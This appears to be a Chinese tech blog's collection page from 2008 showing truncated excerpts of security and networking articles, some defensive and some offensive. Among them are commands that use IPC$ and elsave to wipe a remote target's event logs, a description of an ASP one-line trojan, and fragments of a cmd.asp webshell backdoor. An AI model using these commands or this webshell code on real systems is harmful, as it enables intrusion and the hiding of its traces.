得峰的专栏 [网络收藏]

无线双机互连配置（无路由或无AP，只通过无线网卡） (2008-08-30 08:51:14) 标签：it   首先在一台机子的网上邻居，右键点击选择“属性”1）选中要来设置的无线网卡的连接“网络连接”窗口，右击打算用来共享的无线网卡并且选择“属性”，会弹出新的窗口。在弹出的窗口中设置笔记本电脑（也可能是台式机）的无线网卡TCP/IP

批处理文件是将一系列命令按一定的顺序集合为一个可执行的文本文件，其扩展名为BAT。 1、 REM REM 是个注释命令一般是用来给程序加上注解的，该命令后的内容在程序执行的时候将不会被显示和执行。例： REM 你现在看到的就是注解，这一句将不会被执行。在以后的例子中解释的内容都REM 会放在REM后面。请大家注意。 2、 ECHO ECHO 是一个回显命令主要参数有OFF和 ON,一般用ECHO

  近段日子大家总对fso的戒心很大，不是想要关闭就要删除，其实不然，以后我就零散的说几点关于fso的一些东西，也许会有不

汇编语言超浓缩教程 汇编语言超浓缩教程（新手必看）（精）   “ 哎哟，哥们儿，还捣鼓汇编呢？那东西没用，兄弟用VB"钓"一个

  　　Windows 2000的日志文件通常有应用程序日志，安全日志、系统日志、DNS服务器日志、FTP日志、WWW日志等等，可能会根据服务器所开启的服务不同。当我们用流光探测时，比如说IPC探测，就会在安全日志里迅速地记下流光探测时所用的用户名、时间等等，用FTP探

禁止windows自带tftp客户端的使用作者: 未知 来源: 中国协议分析网   大家都知道，很多网络蠕虫或黑客攻击程序都尝试通过某种漏洞获得命令行的运行权限，而这些  获得权限的过程中，蠕虫往往是通过Windows自带的tftp客户端程序去获取一些需要的攻击程序或后门  程序，如什么iishack、nc之类。  如何禁止windows自带的tftp客户端运行呢？

　　　　我们首先找到系统中的tftpd.exe文件，一般我们可以在%systemroot%/system32/dllcache目录下找到该文件，建议把该文件copy到其他目录。 　　C:/>copy %systemroot%/system32/dllcache/tftpd.exe %systemroot%/system32 　　已复制 1 个文件。 　　我们会用Windows 2000下的

系统服务：TFTP 在Windows的操作系统中，有一个名为tftp的客户端，很多骇客可以利用它去上传一些攻击工具………。这个服务原本是为了网络文件传输服务的。没想到却变成了一颗“定时炸弹”，看到还是要把它给请出去为宜。p　　操作过程：　　1.建立TFTP服务器　　为了弄清

BAT批处理文件语法 扩展名是bat(在nt/2000/xp/2003下也可以是cmd)的文件就是批处理文件。 ==== 注 ============

我通过对比手工添加例外前后的注册表更改情况发现某些键被更改和添加： =|o3)L1fl ^~dRiu ];,}qcG  ----------------------------------Firewall.reg　start---------------------------------------- 1}l>P]hxw%2$WQ>A?4%DA5G  Windows Re

一直以来,我们对Windows的网络同步时间用得比较少,但这段时间因为时间问题而导致的网吧部份游戏无法正常运行的问题时有出现,所以不得不重新开启时间同步服务.一般情况下时间同步有可能是服务器的地址有问题,可以把下列文字复制,新建一个文本文档另存为reg文件,双击导入注册表.Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE/S

防止ARP攻击的方法   最近饱受ARP攻击之苦,于是上网查询解决之道,有专门的"ARP保护神",但我采用的是更酷一点的方法:

最近实战抢了几个不错的大米，得失之间总结一下经验，也算给一些爱米的朋友提点建议作为参考。域名抢注就是一个域名在被别人注册之前，抢先将此域名以注册人的名义注册下来的行为。1 选择当天的好米可以到金米网或淘米网选择当天的好米http://www.kingnic.com/delete/http://www.taomi.cc2 可以到这里查找该域名的历史作为判断的标准之一：http://web.archi

我收集的国外time server的名单，欢迎测试使用。 Active Servers AR time.sinectis.com.ar (216.244.192.3) AR tick.nap.com.ar (200.49.40.1) AR tock.nap.com.ar (200.49.40.15) AU ntp.saard.net (203.21.37.18) BE ntp1.belbone.b

以下的介绍方法是本人通常对付MD5的一些小经验,希望那些发完求助帖就回去睡觉,并希望第2天谁醒就有人帖出密码的多动动脑子,求人还不如求己,人有多大胆,地有多大产.没有解不开的结,没有不透风的抢,没有用不完的卫生纸........好了不YY了,进入正体:     1:网上查询      网络时代就是好,什么都可以在网上查到,当然MD5密码也不例外,当然,不可能什么密码都能查到,不然那就不是无法反向还

166.111.8.28(清华大学DNS服务器) 202.112.0.35(中国教育网DNS服务器)   收藏几个国外的DNS服务器地址

  专题文章 漏洞分析 安全配置 黑客教学 编程技术 工具介绍 火墙技术 入侵检测 破解专题 焦点公告 焦点峰会

利用Google进行入侵的原理及防范 rising2005 发表于 2005-1-28 22:48:00 2004年在拉斯维加斯举行的BlackHat大会上，有两位安全专家分别作了名为You found t

 Learn the pros and cons of Windows Firewall了解Windows防火墙的优缺点英文来源：http://techrepublic.com.com/5100-1009_11-6063367.html?tag=nl.e101by  Michael Mullins CCNA, MCP作者：Michael Mullins CCNA, MCP翻译：endure

 向运行平凡文件传输协议 (TFTP) 服务或 daemon 的远程计算机（尤其是运行 UNIX 的计算机）传输文件或从运行平凡文件传输协议 (TFTP) 服务或 daemon 的远程计算机（尤其是运行 UNIX 的计算机）传输文件。语法tftp [-i] [Host] [{get | put}] [Source] [Destination]参数-i 指定二进制图像传送模式（也

 如果你想学习使用进行后台FTP下载，那么就必须学习FTP指令。 FTP的命令行格式为： ftp -v -d -i -n -g [主机名] ， 其中 -v 显示远程服务器的所有响应信息； -n 限制ftp的自动登录，即不使用；.n etrc文件； -d 使用调试方式； -g 取消全局文件名。 FTP使用的内部命令如下(中括号表示可选项): 1.![cmd[args>：在

  攻击的过程中经常要使用到tftp服务器，如果你不方便在你的机器上安装tftp服务器，那么可以在肉鸡上安装，这是比较好的方法。   我们先来学习一下什么叫作TFTP.TFTP：(Trivial File Transf

 一句话木马：服务端和客户端内容分别如下：服务端代码： //只要将次代码插入数据库即可，最好他的数据库修改成xxx.asp之类的了。客户端代码：     //注：xxx.asp为数据库，也就                             //是你至少要知道数据库路径            set lP=server.CreateObject("Adodb.Stream")

 　说明：本文中所需环境为2003Server+iis6.0+ms sql2000　　曾经很早就在网上看到一篇关于＜asp.net虚拟主机的重大隐患＞的文章，当时并不在意，做过asp虚拟主机的朋友可能都知道，即对每一个用户都设置一个独立的服务器用户和单个目录的操作权限，能够基本上解决asp的fso问题。　　在网上无意中发现了一个叫做webadmin的asp.net-webshell，对自己的服务器

系统设置网上有一句话是“最小的权限+最少的服务=最大的安全”。此句基本上是个人都看过，但我好像没有看到过一篇讲的比较详细稍具全面的文章，下面就以我个人经验作一次教学尝试！最小的权限如何实现？NTFS系统权限设置 在使用之前将每个硬盘根加上 Administrators 用户为全部权限(可选加入SYSTEM用户)删除其它用户，进入系统盘:权限如下C:/WINDOWS Administrators S

 以前用Windows 2000的终端服务，改变默认端口后Web方式访问失效。感觉windows2003应该解决了这个问题，就去查看kb，里面果然提到2003解决了此问题。现在把方法写下来，并把相关的知识总结一下，供大家参考。适用范围：Windows终端服务（当然包括远程桌面），本实验由于系统不同甚至sp不同都有可能导致不同的结果，请注意下面的适用版本。1、改变终端服务默认端口代码

.NET Framework 的新特性――代码访问安全性 　　为了更好的理解这一问题的解决方法,我们需要先介绍一下.NET Framework的安全机制。然后再结合我们的实际问题来讨论解决方案。 　　为了解决安全问题，.NET Framework提供了一种称为代码访问安全性的安全机制。代码访问安全性允许根据代码的来源和代码的标识等属性将代码设置为不同级别的信任代码,同时还详细定义了不同级别的对代码

 由于以前一直没用过XP系统（还是在大学那会xp刚出来的时候用过，以后就一直没用过xp，当时不喜欢它花里胡哨的界面，呵呵。），没碰到过这样的问题，今天在帮一个网友mm解决excel导入到sqlserver数据库中遇到这样的问题，asp代码里无权限创建excel对象（偶的是XP Professional 英文版），大概是xp默认权限限制的问题，于是到百度里搜索了一下，找到了解决办法如下：很多使用

简单黑客工具的使用1.小榕的elsave清除日志的使用:  　　先用ipc$管道进行连接:net use //ip/ipc$ "password" /user:""  　　清除目标系统的应用程序日志:  　　elsave -s //ip -l "application" -C  　　清除目标系统的系统日志:  　　elsave -s //ip -l "s

 一，ping 　　 　　它是用来检查网络是否通畅或者网络连接速度的命令。作为一个生活在网络上的管理员或者黑客来说，ping命令是第一个必须掌握的DOS命令，它所利用的原理是这样的：网络上的机器都有唯一确定的IP地址，我们给目标IP地址发送一个数据包，对方就要返回一个同样大小的数据包，根据返回的数据包我们可以确定目标主机的存在，可以初步判断目标主机的操作系统等。下面就来看看它的一些常用的操

很早就想总结一下新手常见的问题和回答了。但一直没有空出时间来做。在论坛久了，发现一个不得不解决的问题，就是重复发问。一个问题被换汤不换药地反复提出，如果不回答就会被认为摆架子、有违“零起点”的称号；如果详细回答实在是浪费时间；如果简单的说几句，让提问的人自己找资料还是很难让人满意。尤其是现在，只有认证会员才能搜索了。于是出现了一些请人帮忙找资料的情况。要么就是申请得到会员认证。大家的精力就被这样消

利用 IIS日志追查网站入侵者作者：HaK_BaN[B.C.T]出处：cnbct.org责任编辑： 原野 [ 2005-04-11 18:15 ]如何追查黑客呢？请看本文为你介绍的通过IIS日志追查入侵者的方法…… 　　以前黑站黑了很多，但是就没有想过会不会被追踪到，都没有想过怎么去擦自己的屁股，万万没想到在自己不再黑站的时候，却发现了自己的BBS被黑了

请教汉字的ASCII码问题

在很多程序里，所有需使用键盘输入的字元的特效都是以 ASCII 码来表示，简单的说若在键盘上按下0，电脑內部所接受到的树值是48。 ASCII碼

这里的asp后门不指像那些一句话木马、砍客、冰狐之类的b/s型的，只指像cmd.asp或2005a.asp的。第一个，来看zzzeva免fso的cmd.asp代码如下："&request.form("cmd")).stdout.readall%>是不是觉得有点长了？在注入时写有点不好写。那来改一下。第二个，更改zzzeva免fso的cmd.asp代码如下："&request("cmd")).s

                                         以操作系统命令行解释器的方式执行给定的命令字符串，并以文本行方式返回任何输出。授予非管理用户执行 xp_cmdshell 的权限。说明  在 Microsoft® Windows® 98 操作系统中执行 xp_cmdshell 时，将不把 xp_cmdshell 的返回代码设置为唤醒调用的可执

安全基础： 如何彻底清除本地和远程系统日志文件日期:2004-02-19什么是日志文件？它是一些文件系统集合，依靠建立起的各种数据的日志文件而存在。在任何系统发生崩溃或需要重新启动时，数据就遵从日志文件中的信息记录原封不动进行恢复。日志对于系统安全的作用是显而易见的，无论是网络管理员还是 黑客都非常重视日志，一个有经验的管理员往往能够迅速通过日志了解到系统的安全性能，而一个聪明的黑客会在入侵成功后

<!-- Beginfunction showKeyCode(){var character = document.characterCode.character.value.substring(0,1);var code = document.characterCode.character.value.charCodeAt(0);var msg = "字符 /""+ch

 　　ASP提供了强大的文件系统访问能力，可以对服务器硬盘上的任何文件进行读、写、复制、删除、改名等操作，这给学校网站的安全带来巨大的威胁。现在很多校园主机都遭受过FSO木马的侵扰。但是禁用FSO组件后，引起的后果就是所有利用这个组件的ASP程序将无法运行，无法满足客户的需求。如何既允许FileSystemObject组件，又不影响服务器的安全性呢（即：不同虚拟主机用户之间不能使用该组件读写别